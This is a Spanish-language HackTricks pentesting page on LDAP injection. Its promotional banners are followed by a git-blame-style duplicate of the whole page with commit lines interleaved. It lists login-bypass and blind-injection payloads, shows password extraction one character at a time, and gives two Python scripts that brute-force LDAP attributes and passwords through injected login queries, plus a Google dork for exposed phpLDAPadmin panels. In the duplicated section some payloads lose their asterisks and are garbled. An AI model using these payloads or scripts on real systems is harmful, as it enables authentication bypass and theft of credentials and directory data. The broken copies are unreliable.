hacktricks/pentesting-web/ldap-injection.md

# Inyección LDAP

## Inyección LDAP

<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Consejo para cazar recompensas**: **regístrate** en **Intigriti**, una plataforma premium de caza de recompensas creada por hackers, para hackers. Únete a nosotros en [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoy y comienza a ganar recompensas de hasta **$100,000**.

{% embed url="https://go.intigriti.com/hacktricks" %}

## Inyección LDAP

### **LDAP**

**Si quieres saber qué es LDAP accede a la siguiente página:**

{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}

La **Inyección LDAP** es un ataque utilizado para **explotar** aplicaciones basadas en **web** que construyen **declaraciones LDAP** basadas en **entrada de usuario**. Cuando una aplicación **falla** en **sanitizar** correctamente la entrada del usuario, es posible modificar las declaraciones LDAP utilizando un proxy local.

{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}

**Filtro** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
**(&)** = Absolutamente VERDADERO\
**(|)** = Absolutamente FALSO

Por ejemplo:\
`(&(!(objectClass=Impresoras))(uid=s*))`\
`(&(objectClass=user)(uid=*))`

Puedes acceder a la base de datos, y esta puede contener información de muchos tipos diferentes.

**OpenLDAP**: Si llegan 2 filtros, solo ejecuta el primero.\
**ADAM o Microsoft LDS**: Con 2 filtros lanzan un error.\
**SunOne Directory Server 5.0**: Ejecuta ambos filtros.

**Es muy importante enviar el filtro con la sintaxis correcta o se lanzará un error. Es mejor enviar solo 1 filtro.**

El filtro debe comenzar con: `&` o `|`\
Ejemplo: `(&(directory=val1)(folder=public))`

`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`

Entonces: `(&(objectClass=`**`*)(ObjectClass=*))`** será el primer filtro (el que se ejecuta).

### Evasión de Inicio de Sesión

LDAP admite varios formatos para almacenar la contraseña: claro, md5, smd5, sh1, sha, crypt. Por lo tanto, podría ser que independientemente de lo que insertes en la contraseña, esta se cifre.
```bash
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
```

```bash
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```

```bash
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
```

```bash
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
```

```bash
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
```

```bash
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
```

```bash
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```

```bash
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
```

```bash
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
#### Listas

* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
* [Atributos LDAP](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
* [Atributos de LDAP PosixAccount](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)

### Inyección LDAP Ciega

Puedes forzar respuestas Falsas o Verdaderas para verificar si se devuelve algún dato y confirmar una posible Inyección LDAP Ciega:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```

```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
#### Volcado de datos

Puede iterar sobre las letras ascii, dígitos y símbolos:
```bash
(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
```
### Scripts

#### **Descubrir campos LDAP válidos**

Los objetos LDAP **contienen por defecto varios atributos** que podrían ser utilizados para **guardar información**. Puedes intentar **fuerza bruta en todos ellos para extraer esa información.** Puedes encontrar una lista de [**atributos LDAP predeterminados aquí**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).
```python
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
```
#### **Inyección LDAP ciega especial (sin "\*")**
```python
#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
```
### Google Dorks
```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```
### Más Cargas Útiles

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}

<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Consejo para cazadores de recompensas**: **regístrate** en **Intigriti**, una plataforma de recompensas por errores premium creada por hackers, para hackers. ¡Únete a nosotros en [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoy mismo y comienza a ganar recompensas de hasta **$100,000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

<details>

<summary><strong>Aprende a hackear AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
f 2023-06-05 18:33:24 +00:00			`# Inyección LDAP`

			`## Inyección LDAP`

			`<details>`

Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`Otras formas de apoyar a HackTricks:`

			`* Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Consigue el [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:33:24 +00:00
			`</details>`

			`<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`Consejo para cazar recompensas: regístrate en Intigriti, una plataforma premium de caza de recompensas creada por hackers, para hackers. Únete a nosotros en [https://go.intigriti.com/hacktricks](https://go.intigriti.com/hacktricks) hoy y comienza a ganar recompensas de hasta $100,000.`
f 2023-06-05 18:33:24 +00:00
			`{% embed url="https://go.intigriti.com/hacktricks" %}`

Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`## Inyección LDAP`

f 2023-06-05 18:33:24 +00:00			`### LDAP`

Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`Si quieres saber qué es LDAP accede a la siguiente página:`
f 2023-06-05 18:33:24 +00:00
			`{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}`
			`[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)`
			`{% endcontent-ref %}`

Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`La Inyección LDAP es un ataque utilizado para explotar aplicaciones basadas en web que construyen declaraciones LDAP basadas en entrada de usuario. Cuando una aplicación falla en sanitizar correctamente la entrada del usuario, es posible modificar las declaraciones LDAP utilizando un proxy local.`
f 2023-06-05 18:33:24 +00:00
			`{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}`

			`Filtro = ( filtercomp )\`
			`Filtercomp = and / or / not / item\`
			`And = & filterlist\`
			`Or = \|filterlist\`
			`Not = ! filter\`
			`Filterlist = 1\*filter\`
			`Item= simple / present / substring\`
			`Simple = attr filtertype assertionvalue\`
			`Filtertype = _'=' / '\~=' / '>=' / '<='_\`
			`Present = attr = \*\`
			`Substring = attr ”=” \[initial] \* \[final]\`
			`Initial = assertionvalue\`
			`Final = assertionvalue\`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`(&) = Absolutamente VERDADERO\`
			`(\|) = Absolutamente FALSO`
f 2023-06-05 18:33:24 +00:00
			`Por ejemplo:\`
			`(&(!(objectClass=Impresoras))(uid=s*))`\
			`(&(objectClass=user)(uid=*))`

			`Puedes acceder a la base de datos, y esta puede contener información de muchos tipos diferentes.`

			`OpenLDAP: Si llegan 2 filtros, solo ejecuta el primero.\`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`ADAM o Microsoft LDS: Con 2 filtros lanzan un error.\`
f 2023-06-05 18:33:24 +00:00			`SunOne Directory Server 5.0: Ejecuta ambos filtros.`

			`Es muy importante enviar el filtro con la sintaxis correcta o se lanzará un error. Es mejor enviar solo 1 filtro.`

			El filtro debe comenzar con: `&` o `\|`\
			Ejemplo: `(&(directory=val1)(folder=public))`

			`(&(objectClass=VALUE1)(type=Epson*))`\
			`VALUE1 = )(ObjectClass=))(&(objectClass=void`

			Entonces: `(&(objectClass=`*`)(ObjectClass=))`* será el primer filtro (el que se ejecuta).

Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`### Evasión de Inicio de Sesión`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`LDAP admite varios formatos para almacenar la contraseña: claro, md5, smd5, sh1, sha, crypt. Por lo tanto, podría ser que independientemente de lo que insertes en la contraseña, esta se cifre.`
f 2023-06-05 18:33:24 +00:00			```bash
			`user=*`
			`password=*`
			`--> (&(user=)(password=))`
			`# The asterisks are great in LDAPi`
			```

			```bash
			`user=*)(&`
			`password=*)(&`
			`--> (&(user=)(&)(password=)(&))`
			```

			```bash
			`user=*)(\|(&`
			`pass=pwd)`
			`--> (&(user=*)(\|(&)(pass=pwd))`
			```

			```bash
			`user=)(\|(password=`
			`password=test)`
			`--> (&(user=)(\|(password=)(password=test))`
			```

			```bash
			`user=*))%00`
			`pass=any`
			`--> (&(user=*))%00 --> Nothing more is executed`
			```

			```bash
			`user=admin)(&)`
			`password=pwd`
			`--> (&(user=admin)(&))(password=pwd) #Can through an error`
			```

			```bash
			`username = admin)(!(&(\|`
			`pass = any))`
			`--> (&(uid= admin)(!(& (\|) (webpassword=any)))) —> As (\|) is FALSE then the user is admin and the password check is True.`
			```

			```bash
			`username=*`
			`password=*)(&`
			`--> (&(user=)(password=)(&))`
			```

			```bash
			`username=admin))(\|(\|`
			`password=any`
			`--> (&(uid=admin)) (\| (\|) (webpassword=any))`
			```
			`#### Listas`

			`* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)`
			`* [Atributos LDAP](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`* [Atributos de LDAP PosixAccount](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`### Inyección LDAP Ciega`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`Puedes forzar respuestas Falsas o Verdaderas para verificar si se devuelve algún dato y confirmar una posible Inyección LDAP Ciega:`
f 2023-06-05 18:33:24 +00:00			```bash
			`#This will result on True, so some information will be shown`
			`Payload: )(objectClass=))(&objectClass=void`
			`Final query: (&(objectClass= )(objectClass=))(&objectClass=void )(type=Pepi*))`
			```

			```bash
			`#This will result on True, so no information will be returned or shown`
			`Payload: void)(objectClass=void))(&objectClass=void`
			`Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))`
			```
			`#### Volcado de datos`

Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`Puede iterar sobre las letras ascii, dígitos y símbolos:`
f 2023-06-05 18:33:24 +00:00			```bash
			`(&(sn=administrator)(password=*)) : OK`
			`(&(sn=administrator)(password=A*)) : KO`
			`(&(sn=administrator)(password=B*)) : KO`
			`...`
			`(&(sn=administrator)(password=M*)) : OK`
			`(&(sn=administrator)(password=MA*)) : KO`
			`(&(sn=administrator)(password=MB*)) : KO`
			`...`
			```
			`### Scripts`

			`#### Descubrir campos LDAP válidos`

Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`Los objetos LDAP contienen por defecto varios atributos que podrían ser utilizados para guardar información. Puedes intentar fuerza bruta en todos ellos para extraer esa información. Puedes encontrar una lista de [atributos LDAP predeterminados aquí](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).`
f 2023-06-05 18:33:24 +00:00			```python
			`#!/usr/bin/python3`
			`import requests`
			`import string`
			`from time import sleep`
			`import sys`

			`proxy = { "http": "localhost:8080" }`
			`url = "http://10.10.10.10/login.php"`
			`alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"`

			`attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]`

			`for attribute in attributes: #Extract all attributes`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`value = ""`
			`finish = False`
			`while not finish:`
			`for char in alphabet: #In each possition test each possible printable char`
			`query = f")({attribute}={value}{char}"`
			`data = {'login':query, 'password':'bla'}`
			`r = requests.post(url, data=data, proxies=proxy)`
			`sys.stdout.write(f"\r{attribute}: {value}{char}")`
			`#sleep(0.5) #Avoid brute-force bans`
			`if "Cannot login" in r.text:`
			`value += str(char)`
			`break`

			`if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value`
			`finish = True`
			`print()`
f 2023-06-05 18:33:24 +00:00			```
			`#### *Inyección LDAP ciega especial (sin "\")**`
			```python
			`#!/usr/bin/python3`

			`import requests, string`
			`alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"`

			`flag = ""`
			`for i in range(50):`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`print("[i] Looking for number " + str(i))`
			`for char in alphabet:`
			`r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)`
			`if ("TRUE CONDITION" in r.text):`
			`flag += char`
			`print("[+] Flag: " + flag)`
			`break`
f 2023-06-05 18:33:24 +00:00			```
			`### Google Dorks`
			```bash
			`intitle:"phpLDAPadmin" inurl:cmd.php`
			```
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`### Más Cargas Útiles`
f 2023-06-05 18:33:24 +00:00
			`{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}`

			`<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`Consejo para cazadores de recompensas: regístrate en Intigriti, una plataforma de recompensas por errores premium creada por hackers, para hackers. ¡Únete a nosotros en [https://go.intigriti.com/hacktricks](https://go.intigriti.com/hacktricks) hoy mismo y comienza a ganar recompensas de hasta $100,000!`
f 2023-06-05 18:33:24 +00:00
			`{% embed url="https://go.intigriti.com/hacktricks" %}`

			`<details>`

Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`<summary><strong>Aprende a hackear AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

			`Otras formas de apoyar a HackTricks:`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`* Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Consigue el [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Comparte tus trucos de hacking enviando PRs a los repositorios de github de [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:33:24 +00:00
			`</details>`